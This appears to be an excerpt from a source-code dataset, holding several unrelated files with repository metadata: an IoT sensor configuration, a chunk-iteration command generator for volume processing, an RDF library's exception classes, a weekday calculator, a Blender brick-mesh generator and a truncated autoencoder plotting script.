repo_name
stringlengths 5
92
| path
stringlengths 4
232
| copies
stringclasses 19
values | size
stringlengths 4
7
| content
stringlengths 721
1.04M
| license
stringclasses 15
values | hash
int64 -9,223,277,421,539,062,000
9,223,102,107B
| line_mean
float64 6.51
99.9
| line_max
int64 15
997
| alpha_frac
float64 0.25
0.97
| autogenerated
bool 1
class |
---|---|---|---|---|---|---|---|---|---|---|
lnanhkhoa/thesis-iot-khoa | iot/data/configNode.py | 1 | 1711 | databaseNode = {
"DateNow": "2017-01-05",
"TimeNow": "10:16:10",
"d": {
"dataNodeMaster01": {
"Device01": 0,
"Device02": 0,
"Device03": 0,
"Device04": 0,
"Device05": 0,
"Device06": 0,
"Device07": 0,
"Device08": 0,
"Device09": 0,
"Device10": 0,
"Device11": 0,
"Device12": 0,
"Sensor01": 28.9,
"Sensor02": 29.1,
"Sensor03": 0.0,
"Sensor04": 0.0,
"Sensor05": 0.0
},
"dataNodeSlave01": {
"Device01": 0,
"Device02": 0,
"Device03": 0,
"Device04": 0,
"Device05": 0,
"Device06": 0,
"Device07": 0,
"Device08": 0,
"Device09": 0,
"Device10": 0,
"Sensor01": 28.9,
"Sensor02": 0.0,
"Sensor03": 54.0,
"Sensor04": 24.0,
"Sensor05": 0.0,
"Sensor06": 0.0,
"Sensor07": 0.0,
"Sensor08": 0
},
"dataNodeSlave02": {
"Device01": 0,
"Device02": 0,
"Device03": 1,
"Device04": 0,
"Device05": 0,
"Device06": 0,
"Device07": 0,
"Device08": 0,
"Device09": 0,
"Device10": 0,
"Sensor01": 28.9,
"Sensor02": 29.1,
"Sensor03": 0.0,
"Sensor04": 0.0,
"Sensor05": 0.0,
"Sensor06": 6.0,
"Sensor07": 75.0,
"Sensor08": 0
}
},
"number": 1483586170
} | apache-2.0 | -8,739,905,282,718,457,000 | 24.939394 | 29 | 0.354763 | false |
elhuhdron/emdrp | emdrp/emdrp/dpCubeIter.py | 1 | 19641 | #!/usr/bin/env python
# The MIT License (MIT)
#
# Copyright (c) 2016 Paul Watkins, National Institutes of Health / NINDS
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# Generator class for creating chunk/size/offset/name information for hdf5 files
# containing blocks of supervoxels that overlap at the edges between blocks.
# This is the basis for "stitching" together blocks using an overlap method.
import argparse
import os
import numpy as np
class dpCubeIter(object):
LIST_ARGS = ['fileflags', 'filepaths', 'fileprefixes', 'filepostfixes', 'filemodulators',
'filepaths_affixes', 'filenames_suffixes', 'filemodulators_overlap']
TRUE_STRS = ['true', '1', 't', 'y', 'yes', 'yeah', 'yup', 'certainly', 'uh-huh']
#def __init__(self, inprefix, volume_range_beg, volume_range_end, overlap,
# cube_size=[1,1,1], left_remainder_size=[0,0,0], right_remainder_size=[0,0,0],
# chunksize=[128,128,128], leave_edge=False):
# # str - prefix for the name of the file
# self.inprefix = inprefix
# # (3,) int - beginning and end of ranges in chunks specified python-style
# self.volume_range_beg = np.array(volume_range_beg, dtype=np.int64)
# self.volume_range_end = np.array(volume_range_end, dtype=np.int64)
# # (3,) int - how much overlap in each direction in voxels
# self.overlap = np.array(overlap, dtype=np.int64)
# # (3,) int - size of each cube being stitched in chunks
# self.cube_size = np.array(cube_size, dtype=np.int64)
# # (3,) int - size of remainder edges on "left" and "right" sides for unaligned stitching in voxels
# self.left_remainder_size = np.array(left_remainder_size, dtype=np.int64)
# self.right_remainder_size = np.array(right_remainder_size, dtype=np.int64)
# # (3,) int - chunksize in voxels
# self.chunksize = np.array(chunksize, dtype=np.int64)
# # bool - whether to leave the overlap on the right edges
# self.leave_edge = bool(leave_edge)
def __init__(self, args):
# save command line arguments from argparse, see definitions in main or run with --help
for k, v in vars(args).items():
# do not override any values that are already set as a method of allowing inherited classes to specify
if hasattr(self,k): continue
if type(v) is list and k not in self.LIST_ARGS:
if len(v)==1:
setattr(self,k,v[0]) # save single element lists as first element
elif type(v[0]) is int: # convert the sizes and offsets to numpy arrays
setattr(self,k,np.array(v,dtype=np.int32))
else:
setattr(self,k,v) # store other list types as usual (floats)
else:
setattr(self,k,v)
# other inits
self.chunksize = self.use_chunksize
self.cube_size_voxels = self.cube_size * self.chunksize
self.left_remainder = self.left_remainder_size > 0; self.right_remainder = self.right_remainder_size > 0
self.volume_range = self.volume_range_end - self.volume_range_beg
assert( (self.volume_range % self.cube_size == 0).all() )
self.volume_step = self.volume_range // self.cube_size
self.volume_step += self.left_remainder; self.volume_step += self.right_remainder
self.volume_size = np.prod(self.volume_step)
# modulators default to all ones
self.nflags = len(self.fileflags)
# this is for the python interface mode (does not use the argument flag / file name creation stuff)
if self.nflags == 0: self.nflags = 1
if len(self.filemodulators) == 0:
self.filemodulators = np.ones((self.nflags,3),dtype=np.uint32)
else:
self.filemodulators = np.array(self.filemodulators,dtype=np.uint32).reshape((-1,3))
assert(self.filemodulators.shape[0] == self.nflags)
if len(self.filemodulators_overlap) == 0:
self.filemodulators_overlap = np.zeros((3,),dtype=np.uint32)
else:
self.filemodulators_overlap = np.array(self.filemodulators_overlap,dtype=np.uint32)
assert(self.filemodulators_overlap.size == 3)
# this is something of a hack to allow for creating hdf5s with overlaps from knossos-style cubes.
# xxx - probably not a good way to make this a lot cleaner without completely reimplementing emdrp
# data objects as knossos-style with compression and embedded overlap, make data more easily distributable
self.filemodulators_overlap_on = np.any(self.filemodulators_overlap > 0)
# did not see the point of omitting an overlap in just one dimensions (unclear use case)
assert( not self.filemodulators_overlap_on or np.all(self.filemodulators_overlap > 0) )
if self.filemodulators_overlap_on:
# remainders and modulator overlaps are not designed to work together and also use case?
assert( not self.left_remainder.any() and not self.right_remainder.any() )
self.filemodulators_overlap_volume_range = self.volume_range - 2
assert( (self.filemodulators_overlap_volume_range % self.filemodulators[-1,:] == 0).all() )
self.filemodulators_overlap_volume_step_inner = \
self.filemodulators_overlap_volume_range // self.filemodulators[-1,:]
self.filemodulators_overlap_cube_size = self.filemodulators[-1,:] + 2
self.filemodulators_overlap_volume_step = self.filemodulators_overlap_volume_step_inner * \
self.filemodulators_overlap_cube_size
self.filemodulators_overlap_volume_size = np.prod(self.filemodulators_overlap_volume_step)
if len(self.filepaths_affixes) == 0:
self.filepaths_affixes = [False for x in range(self.nflags)]
else:
assert( len(self.filepaths_affixes) == self.nflags )
self.filepaths_affixes = [s.lower() in self.TRUE_STRS for s in self.filepaths_affixes]
if len(self.filenames_suffixes) == 0:
self.filenames_suffixes = [True for x in range(self.nflags)]
else:
assert( len(self.filenames_suffixes) == self.nflags )
self.filenames_suffixes = [s.lower() in self.TRUE_STRS for s in self.filenames_suffixes]
def __iter__(self):
if self.filemodulators_overlap_on:
# this is something of a hack to allow for creating hdf5s with overlaps from knossos-style cubes.
use_volume_size = self.filemodulators_overlap_volume_size
use_volume_step = self.filemodulators_overlap_volume_step
fm_cube_size = self.filemodulators_overlap_cube_size
else:
use_volume_size = self.volume_size
use_volume_step = self.volume_step
cur_ovlp = np.zeros((3,),dtype=np.int32)
for cur_index in range(use_volume_size):
# the current volume indices, including the right and left remainders
cur_volume = np.array(np.unravel_index(cur_index, use_volume_step), dtype=np.int64)
if self.filemodulators_overlap_on:
# this is basically a completely seperate mode, consider as another script?
left_offset, is_left_border, is_right_border = [np.zeros((3,),dtype=np.int32) for i in range(3)]
is_left_remainder, is_right_remainder = [np.zeros((3,),dtype=np.bool) for i in range(2)]
cur_fm_volume = cur_volume // fm_cube_size
cur_chunk = (cur_volume * self.cube_size) - 2*cur_fm_volume + self.volume_range_beg
cur_ovlp = np.zeros((3,),dtype=np.int32)
sel = (cur_volume % fm_cube_size == 0)
cur_ovlp[sel] = -self.filemodulators_overlap[sel] # "top" cube overlap
sel = (cur_volume % fm_cube_size == fm_cube_size-1)
cur_ovlp[sel] = self.filemodulators_overlap[sel] # "bottom" cube overlap
size = self.cube_size_voxels
else:
# need special cases to handle the remainders
is_left_border = cur_volume == 0; is_right_border = cur_volume == (self.volume_step-1)
is_left_remainder = np.logical_and(is_left_border,self.left_remainder)
is_right_remainder = np.logical_and(is_right_border,self.right_remainder)
is_not_left_remainder = np.logical_not(is_left_remainder)
#is_not_right_remainder = np.logical_not(is_right_remainder)
assert( not (np.logical_and(is_left_remainder, is_right_remainder)).any() ) # bad use case
# left and right remainders are offset from the start of the previous and last chunks respectfully
cur_volume[is_not_left_remainder] -= self.left_remainder[is_not_left_remainder]
cur_chunk = cur_volume * self.cube_size + self.volume_range_beg
cur_chunk[is_left_remainder] -= self.cube_size[is_left_remainder]
left_offset = self.overlap.copy(); right_offset = self.overlap.copy();
if not self.leave_edge:
right_offset[is_right_border] = 0; left_offset[is_left_border] = 0
# default size is adding left and right offsets
size = self.cube_size_voxels + left_offset + right_offset
# special cases for remainder blocks
size[is_left_remainder] = self.left_remainder_size[is_left_remainder] + right_offset[is_left_remainder]
size[is_right_remainder] = self.right_remainder_size[is_right_remainder] + \
left_offset[is_right_remainder]
left_offset = -left_offset # default left offset is set negative as returned offset
# left offset for left remainder block is from the left side of previous cube
left_offset[is_left_remainder] = \
self.cube_size_voxels[is_left_remainder] - self.left_remainder_size[is_left_remainder]
# modified to allow for "modulators" which allows for chunk descriptors that only change at multiples of
# cube_size. allows for cubeiter to create command lines containing arguments with different cube_sizes
suffixes = [None] * self.nflags; affixes = [None] * self.nflags
for j in range(self.nflags):
fm = self.filemodulators[j,:]
if (fm==1).all():
mcur_chunk = cur_chunk
else:
if self.filemodulators_overlap_on:
mcur_chunk = cur_fm_volume*self.filemodulators[-1,:]*self.cube_size + self.volume_range_beg + 1
else:
mcur_chunk = (cur_volume // fm)*fm * self.cube_size + self.volume_range_beg
# create the name suffixes, path affixes
suffixes[j] = ''; affixes[j] = ''
for s,i in zip(['x','y','z'], range(3)):
r = 'l' if is_left_remainder[i] else ('r' if is_right_remainder[i] else '')
suffixes[j] += ('_%s%04d' % (s + r, mcur_chunk[i]))
affixes[j] = os.path.join(affixes[j], ('%s%04d' % (s, mcur_chunk[i])))
affixes[j] += os.path.sep
yield cur_volume, size, cur_chunk, left_offset, suffixes, affixes, is_left_border, is_right_border, cur_ovlp
def flagsToString(self, flags, paths, prefixes, postfixes, suffixes, affixes):
argstr = ' '
for flag, path, prefix, postfix, suffix, affix in zip(flags, paths, prefixes, postfixes, suffixes, affixes):
if flag != '0':
argstr += '--' + flag + ' '
# xxx - better names?
# affix is the optional knossos-style path (i.e., x0001/y0002/z0005)
# prefix is the specified file name without an extension or path
# suffix is the optional knossos-style addition to the filename (i.e., _x0001_y0002_z0005)
# postfix is the file extension
name = affix + prefix + suffix + postfix
if path != '0':
name = os.path.join(path,name)
argstr += name + ' '
return argstr
def printCmds(self):
if self.cmdfile:
with open(self.cmdfile, 'r') as myfile:
cmd = myfile.read().split('\n'); cmd = [x for x in cmd if x]
else:
cmd = [self.cmd]
ncmd = len(cmd)
cnt = 0
for volume_info in self:
_, size, cur_chunk, left_offset, suffixes, affixes, is_left_border, is_right_border, cur_ovlp = volume_info
ccmd = cmd[0] if ncmd == 1 else cmd[cnt]
str_volume = (' --size %d %d %d ' % tuple(size.tolist())) + \
(' --chunk %d %d %d ' % tuple(cur_chunk.tolist())) + \
(' --offset %d %d %d ' % tuple(left_offset.tolist()))
if self.filemodulators_overlap_on:
str_volume += (' --overlap %d %d %d ' % tuple(cur_ovlp.tolist()))
str_inputs = self.flagsToString(self.fileflags, self.filepaths, self.fileprefixes, self.filepostfixes,
[x if y else '' for x,y in zip(suffixes, self.filenames_suffixes)],
[x if y else '' for x,y in zip(affixes, self.filepaths_affixes)])
str_cmd = ccmd + (''if self.no_volume_flags else str_volume) + str_inputs
if self.pre_cmd: str_cmd = self.pre_cmd + ';' + str_cmd
if self.post_cmd: str_cmd = str_cmd + ';' + self.post_cmd
print(str_cmd)
cnt += 1
@classmethod
def cubeIterGen(cls, volume_range_beg, volume_range_end, overlap, cube_size,
left_remainder_size=None, right_remainder_size=None, chunksize=None, leave_edge=None):
parser = argparse.ArgumentParser(description='cubeIterGen:dpCubeIter',
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
dpCubeIter.addArgs(parser); arg_str = ''
arg_str += ' --volume_range_beg %d %d %d ' % tuple(volume_range_beg)
arg_str += ' --volume_range_end %d %d %d ' % tuple(volume_range_end)
arg_str += ' --overlap %d %d %d ' % tuple(overlap)
arg_str += ' --cube_size %d %d %d ' % tuple(cube_size)
if left_remainder_size is not None: arg_str += ' --left_remainder_size %d %d %d ' % tuple(left_remainder_size)
if right_remainder_size is not None: arg_str += '--right_remainder_size %d %d %d ' % tuple(right_remainder_size)
if chunksize is not None: arg_str += ' --use-chunksize %d %d %d ' % tuple(chunksize)
if leave_edge: arg_str += ' --leave_edge '
args = parser.parse_args(arg_str.split())
return cls(args)
@staticmethod
def addArgs(p):
# adds arguments required for this object to specified ArgumentParser object
p.add_argument('--cmdfile', nargs=1, type=str, default='',
help='Full name and path of text file containing command')
p.add_argument('--cmd', nargs=1, type=str, default='', help='Specify command on command line as string')
p.add_argument('--pre-cmd', nargs=1, type=str, default='',
help='Semi-colon delimited command to print before generated command')
p.add_argument('--post-cmd', nargs=1, type=str, default='',
help='Semi-colon delimited command to print after generated command')
# arguments that modulate each parameter that is being iterated by cubeiter
p.add_argument('--fileflags', nargs='*', type=str, default=[],
help='in/out files command line switches (0 for none)')
p.add_argument('--filepaths', nargs='*', type=str, default=[], help='in/out files paths (0 for none)')
p.add_argument('--fileprefixes', nargs='*', type=str, default=[], help='in/out files filename prefixes')
p.add_argument('--filepostfixes', nargs='*', type=str, default=[], help='in/out files filename postfixes')
p.add_argument('--filemodulators', nargs='*', type=int, default=[],
help='Allows for supervolumes at multiples of cube_size (x0 y0 z0 x1 y1 z1 ...)')
p.add_argument('--filemodulators-overlap', nargs='*', type=int, default=[],
help='Optional overlap (in voxels) for LAST modulator (x0 y0 z0 x1 y1 z1 ...)')
p.add_argument('--filepaths-affixes', nargs='*', type=str, default=[],
help='Whether to append suffix to each filepath (knossos-style, default false)')
p.add_argument('--filenames-suffixes', nargs='*', type=str, default=[],
help='Whether to append suffix to each filename (default true)')
p.add_argument('--volume_range_beg', nargs=3, type=int, default=[0,0,0], metavar=('X', 'Y', 'Z'),
help='Starting range in chunks for total volume')
p.add_argument('--volume_range_end', nargs=3, type=int, default=[0,0,0], metavar=('X', 'Y', 'Z'),
help='Ending range in chunks for total volume (python style)')
p.add_argument('--overlap', nargs=3, type=int, default=[0,0,0], metavar=('X', 'Y', 'Z'),
help='Amount of overlap in each direction')
p.add_argument('--cube_size', nargs=3, type=int, default=[0,0,0], metavar=('X', 'Y', 'Z'),
help='Size in chunks of iterate volume (superchunk)')
p.add_argument('--left_remainder_size', nargs=3, type=int, default=[0,0,0], metavar=('X', 'Y', 'Z'),
help='Size in voxels of "left" remainder volumes')
p.add_argument('--right_remainder_size', nargs=3, type=int, default=[0,0,0], metavar=('X', 'Y', 'Z'),
help='Size in voxels of "right" remainder volumes')
p.add_argument('--use-chunksize', nargs=3, type=int, default=[128,128,128], metavar=('X', 'Y', 'Z'),
help='Size of chunks in voxels')
p.add_argument('--leave_edge', action='store_true', help='Specify to leave overlap at edges of volume range')
p.add_argument('--no_volume_flags', action='store_true',
help='Do not include chunk, size and offset flags in output')
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Generate command lines for parallelized cube processing',
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
dpCubeIter.addArgs(parser)
args = parser.parse_args()
ci = dpCubeIter(args)
ci.printCmds()
| mit | 3,392,337,723,787,381,000 | 60.378125 | 120 | 0.611832 | false |
oldm/OldMan | oldman/exception.py | 1 | 5501 | #-------------------
# Abstract types
#-------------------
class OMError(Exception):
"""Root of exceptions generated by the oldman package expected HTTP ones."""
pass
class ModelGenerationError(OMError):
"""Error when generating a new model."""
pass
class OMRuntimeError(OMError):
"""Error at runtime after the initialization. """
#----------------------
# Main exception types
#----------------------
class OMSchemaError(ModelGenerationError):
"""Error in the schema graph and/or the JSON-LD context."""
pass
class OMUserError(OMRuntimeError):
"""Error when accessing or editing objects."""
pass
class OMDataStoreError(OMRuntimeError):
"""Error detected in the stored data."""
pass
class OMInternalError(OMError):
""" Do not expect it. """
pass
#------------------------------
# Controller (HTTP) exceptions
#------------------------------
class OMControllerException(Exception):
"""TODO: describe """
pass
class OMBadRequestException(OMControllerException):
"""TODO: describe
Error: 400
"""
class OMForbiddenOperationException(OMControllerException):
""" No chance
TODO: improve
"""
pass
class OMRequiredAuthenticationException(OMControllerException):
""" Try again
TODO: improve
"""
pass
class OMResourceNotFoundException(OMControllerException):
""" TODO: describe """
pass
class OMMethodNotAllowedException(OMControllerException):
""" 405 """
pass
class OMNotAcceptableException(OMControllerException):
""" 406 Not Acceptable
TODO: indicate the content-type
"""
pass
#---------------------------------------------------------------------
# Pedantic exceptions
# For clarity
# No need to except them in a programmatic manner, prefer generic exceptions
#---------------------------------------------------------------------
class AlreadyAllocatedModelError(ModelGenerationError):
"""The class IRI or the short name of a new model is already allocated."""
pass
class OMPropertyDefError(OMSchemaError):
"""Inconsistency in the definition of a supported property."""
pass
class OMPropertyDefTypeError(OMPropertyDefError):
"""A RDF property cannot be both an ObjectProperty and a DatatypeProperty."""
pass
class OMAttributeDefError(OMSchemaError):
"""Inconsistency in the definition of a model class attribute."""
pass
class OMAlreadyDeclaredDatatypeError(OMAttributeDefError):
"""At least two different datatypes for the same attribute.
You may check the possible datatype inherited from the property (rdfs:range)
and the one specified in the JSON-LD context.
"""
pass
class OMReservedAttributeNameError(OMAttributeDefError):
"""Some attribute names are reserved and should not
be included in the JSON-LD context."""
pass
class OMUndeclaredClassNameError(ModelGenerationError):
"""The name of the model class should be defined in the JSON-LD context."""
pass
class OMExpiredMethodDeclarationTimeSlotError(ModelGenerationError):
"""All methods must be declared before creating a first model."""
pass
class OMEditError(OMUserError):
"""Runtime errors, occuring when editing or creating an object."""
pass
class OMAttributeTypeCheckError(OMEditError):
"""The value assigned to the attribute has wrong type."""
pass
class OMRequiredPropertyError(OMEditError):
"""A required property has no value."""
pass
class OMReadOnlyAttributeError(OMEditError):
"""End-users are not allowed to edit this attribute."""
pass
class OMUniquenessError(OMEditError):
"""Attribute uniqueness violation.
Example: IRI illegal reusing.
"""
pass
class OMWrongResourceError(OMEditError):
"""Not updating the right object."""
pass
class OMDifferentHashlessIRIError(OMEditError):
"""When creating or updating an object with a different hashless IRI is forbidden.
Blank nodes are not concerned.
"""
pass
class OMForbiddenSkolemizedIRIError(OMEditError):
"""When updating a skolemized IRI from the local domain is forbidden."""
pass
class OMRequiredHashlessIRIError(OMEditError):
"""No hash-less IRI has been given."""
pass
class OMUnauthorizedTypeChangeError(OMEditError):
"""When updating a resource with new types without explicit authorization."""
pass
class OMAccessError(OMUserError):
"""Error when accessing objects."""
pass
class OMAttributeAccessError(OMAccessError):
"""When such an attribute cannot be identified
(is not supported or no model has been found).
"""
pass
class OMClassInstanceError(OMAccessError):
"""The object is not an instance of the expected RDFS class."""
pass
class OMObjectNotFoundError(OMAccessError):
"""When the object is not found."""
pass
class OMHashIriError(OMAccessError):
"""A hash IRI has been given instead of a hash-less IRI."""
pass
class OMSPARQLError(OMAccessError):
"""Invalid SPARQL query given."""
pass
class OMSPARQLParseError(OMInternalError):
"""Invalid SPARQL request."""
pass
class OMAlreadyGeneratedAttributeError(OMInternalError):
"""Attribute generation occurs only once per SupportedProperty.
You should not try to add metadata or regenerate after that.
"""
pass
class UnsupportedDataStorageFeatureException(OMDataStoreError):
"""Feature not supported by the data store.""" | bsd-3-clause | 282,539,723,383,344,740 | 21.275304 | 86 | 0.681331 | false |
jeeyoungk/exercise | python/calendar.py | 1 | 1671 | DAYS_IN_MONTH = [31,28,31,30,31,30,31,31,30,31,30,31]
DAYS_IN_MONTH_CUMULATIVE = [None for i in range(12)]
DOW = ['sun', 'mon', 'tues', 'wed', 'thurs', 'fri', 'sat']
# pre-calculate cumulative days till this month (not including this month).
for i in range(12):
if i == 0: DAYS_IN_MONTH_CUMULATIVE[i] = 0
else: DAYS_IN_MONTH_CUMULATIVE[i] = DAYS_IN_MONTH_CUMULATIVE[i-1] + DAYS_IN_MONTH[i-1]
def year_component(year):
year = year - 1 # don't count this year.
years = year
years4 = year / 4
years100 = year / 100
years400 = year / 400
nonleaps = years - years4 + years100 - years400
leaps = years - nonleaps
days = years * 365 + leaps
return days
def month_component(month):
return DAYS_IN_MONTH_CUMULATIVE[month - 1]
def day_component(day):
return day
def is_leap_year(y):
if y % 4 != 0: return False # normal year
if y % 100 != 0: return True # not every 100 years
if y % 400 != 0: return False # not every 400 years
return True
def weekday(year, month, day):
days = year_component(year) + month_component(month) + day_component(day)
if month > 2 and is_leap_year(year): days += 1
return DOW[(days) % 7]
print weekday(1301, 1, 1) == 'sat'
print weekday(1701, 1, 1) == 'sat'
print weekday(1799, 1, 1) == 'tues'
print weekday(1801, 1, 1) == 'thurs'
print weekday(1899, 1, 1) == 'sun'
print weekday(1901, 1, 1) == 'tues'
print weekday(1998, 1, 1) == 'thurs'
print weekday(1999, 1, 1) == 'fri'
print weekday(2013, 11, 1) == 'fri'
print weekday(2013, 1, 1) == 'tues'
print weekday(2017, 1, 31) == 'tues'
print weekday(2017, 2, 1) == 'wed'
print weekday(2017, 2, 2) == 'thurs'
| mit | -414,533,418,909,324,800 | 32.42 | 90 | 0.624177 | false |
feureau/Small-Scripts | Blender/Blender config/2.91/scripts/addons/bricker_v2-2-1/functions/brick/mesh_generators/tile.py | 1 | 4378 | # Copyright (C) 2020 Christopher Gearhart
# [email protected]
# http://bblanimation.com/
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
# System imports
import bpy
import bmesh
import math
import numpy as np
# Blender imports
from mathutils import Vector
# Module imports
from .generator_utils import *
def make_tile(dimensions:dict, brick_type:str, brick_size:list, circle_verts:int=None, type:str=None, detail:str="LOW", bme:bmesh=None):
"""
create inverted slope brick with bmesh
Keyword Arguments:
dimensions -- dictionary containing brick dimensions
brick_type -- cm.brick_type
brick_size -- size of brick (e.g. standard 2x4 -> [2, 4, 3])
circle_verts -- number of vertices per circle of cylinders
type -- type of tile in ('TILE', 'TILE_GRILL')
detail -- level of brick detail (options: ('FLAT', 'LOW', 'HIGH'))
bme -- bmesh object in which to create verts
"""
# create new bmesh object
bme = bmesh.new() if not bme else bme
# get halfScale
d = Vector((dimensions["half_width"], dimensions["half_width"], dimensions["half_height"]))
d.z = d.z * (brick_size[2] if flat_brick_type(brick_type) else 1)
# get scalar for d in positive xyz directions
scalar = Vector((brick_size[0] * 2 - 1,
brick_size[1] * 2 - 1,
1))
d_scaled = vec_mult(d, scalar)
# get thickness of brick from inside to outside
thick_xy = dimensions["thickness"] - (dimensions["tick_depth"] if "High" in detail and min(brick_size) != 1 else 0)
thick = Vector((thick_xy, thick_xy, dimensions["thickness"]))
# create cube
if "GRILL" in type:
coord1 = -d
coord1.z += dimensions["slit_height"]
coord2 = d_scaled
coord2.z = coord1.z
v1, v4, v3, v2 = make_rectangle(coord1, coord2, face=False, bme=bme)[1]
else:
sides = [1, 1 if detail == "FLAT" else 0, 1, 1, 1, 1]
coord1 = -d
coord1.z += dimensions["slit_height"]
coord2 = d_scaled
v1, v2, v3, v4, v5, v6, v7, v8 = make_cube(coord1, coord2, sides, bme=bme)[1]
# make verts for slit
slit_depth = Vector([dimensions["slit_depth"]]*2)
coord1 = -d
coord1.xy += slit_depth
coord2 = Vector((d_scaled.x, d_scaled.y, -d.z + dimensions["slit_height"]))
coord2.xy -= slit_depth
v9, v10, v11, v12, v13, v14, v15, v16 = make_cube(coord1, coord2, [0, 1 if detail == "FLAT" and "GRILL" not in type else 0, 1, 1, 1, 1], bme=bme)[1]
# connect slit to outer cube
bme.faces.new((v14, v4, v1, v13))
bme.faces.new((v15, v3, v4, v14))
bme.faces.new((v16, v2, v3, v15))
bme.faces.new((v13, v1, v2, v16))
# add details
if "GRILL" in type:
if brick_size[0] < brick_size[1]:
add_grill_details(dimensions, brick_size, thick, scalar, d, v4, v1, v2, v3, v9, v10, v11, v12, bme)
else:
add_grill_details(dimensions, brick_size, thick, scalar, d, v1, v2, v3, v4, v9, v10, v11, v12, bme)
elif detail != "FLAT":
# making verts for hollow portion
coord1 = -d + Vector((thick.x, thick.y, 0))
coord2 = vec_mult(d, scalar) - thick
v17, v18, v19, v20, v21, v22, v23, v24 = make_cube(coord1, coord2, [1, 0, 1, 1, 1, 1], flip_normals=True, bme=bme)[1]
# connect hollow portion to verts for slit
bme.faces.new((v18, v17, v9, v10))
bme.faces.new((v19, v18, v10, v11))
bme.faces.new((v20, v19, v11, v12))
bme.faces.new((v17, v20, v12, v9))
# add supports
if max(brick_size[:2]) > 2:
add_supports(dimensions, dimensions["height"], brick_size, brick_type, circle_verts, type, detail, d, scalar, thick, bme)
return bme
| gpl-3.0 | -8,467,515,662,449,953 | 39.165138 | 152 | 0.620603 | false |
lmjohns3/manifold-experiment | en-dee.py | 1 | 6947 | import climate
import lmj.plot
import logging
import numpy as np
import sklearn.decomposition
import theanets
climate.add_arg('--dimensions', type=int, default=10, metavar='D')
climate.add_arg('--samples', type=int, default=1000, metavar='N')
climate.add_arg('--clusters', type=int, default=20, metavar='K')
climate.add_arg('--features', type=int, default=20, metavar='F')
climate.add_arg('--viscosity', type=float, default=0.9, metavar='V')
climate.add_arg('--plot-pcs', type=int, nargs='+', metavar='K')
climate.add_arg('--plot-dimensions', type=int, nargs='+', metavar='D')
climate.add_arg('--plot-features', type=int, nargs='+', metavar='F')
climate.add_arg('--seed', type=int, metavar='S')
climate.add_arg('--hidden-l1', type=float, default=0, metavar='V')
climate.add_arg('--input-noise', type=float, default=0, metavar='V')
climate.add_arg('--hidden-dropout', type=float, default=0, metavar='V')
climate.add_arg('--activation', default='relu', metavar='A')
TAU = 2 * np.pi
def angle_between(sumsq, radius):
return abs(np.arccos(sumsq / np.sqrt(sumsq) / radius))
def create_dataset(args):
cov = 0.2 * np.eye(args.dimensions)
acc = np.random.randn(args.dimensions)
acc /= np.linalg.norm(acc)
vel = np.random.randn(args.dimensions)
vel /= np.linalg.norm(vel)
mus = [np.zeros(args.dimensions)]
dataset = []
for _ in range(args.clusters):
acc *= 1 - args.viscosity
acc += args.viscosity * np.random.randn(args.dimensions)
acc /= np.linalg.norm(acc)
vel += acc
vel /= np.linalg.norm(vel)
old = mus[-1]
new = mus[-1] + vel
dataset.extend(np.random.multivariate_normal(
(old + new) / 2, cov, args.samples // args.clusters))
mus.append(new)
return dataset
def plot_feature(ax, xs, ys, ux, uy, bias, length, name):
theta = angle_between(ux * ux + uy * uy, length)
if theta > TAU / 8:
return
c = ['#d62728', '#ff7f0e'][bias < 0]
ax.plot(xs, (ux * xs + bias) / -uy, '-', color=c, lw=2, alpha=0.9)
if abs(ux / uy) < 1:
z1, z2 = np.random.random(2) < 0.5
x = xs[[-5, 5][z1]]
y = (ux * x + bias) / -uy
dx = [-20, 20][z1]
dy = [-20, 20][z2]
rad = z1 ^ z2
else:
z1, z2 = np.random.random(2) < 0.5
y = ys[[-5, 5][z1]]
x = (uy * y + bias) / -ux
dy = [-20, 20][z1]
dx = [-20, 20][z2]
rad = not (z1 ^ z2)
ax.annotate(str(name), xy=(x, y), xytext=(dx, dy),
textcoords='offset points', ha='center',
color='#111111', alpha=0.5,
arrowprops=dict(
arrowstyle='->', color='#111111', alpha=0.5,
connectionstyle='arc3,rad={}0.5'.format('+-'[rad])))
class IdentityEncoder:
label = 'Dim'
def __init__(self, axes):
self.axes = axes
def __call__(self, n, x):
return x
class FeatureEncoder:
label = 'Feature'
def __init__(self, axes, network):
self.axes = axes
self.network = network
def __call__(self, n, x):
z = self.network.encode(x.astype('f'))
logging.info('%s %s -> %s', n, x.shape, z.shape)
return z
class PcaEncoder:
label = 'PC'
def __init__(self, axes, dataset):
self.axes = axes
self.pca = sklearn.decomposition.PCA(1 + max(self.axes))
self.pca.fit(dataset)
logging.info('PCA variance %s', self.pca.explained_variance_.round(2))
def __call__(self, n, x):
try:
z = self.pca.encode(x)
logging.info('%s %s -> %s', n, x.shape, z.shape)
return z
except:
return x
def plot(args, encode, dataset, net, plot_features=False):
encoders = net.find('hid1', 'w').get_value().T
decoders = net.find('out', 'w').get_value()
biases = net.find('hid1', 'b').get_value()
norms = np.sqrt((encoders * encoders).sum(axis=1))
noisy = dataset + np.random.randn(*dataset.shape)
shift = net.predict(noisy.astype('f')) - noisy
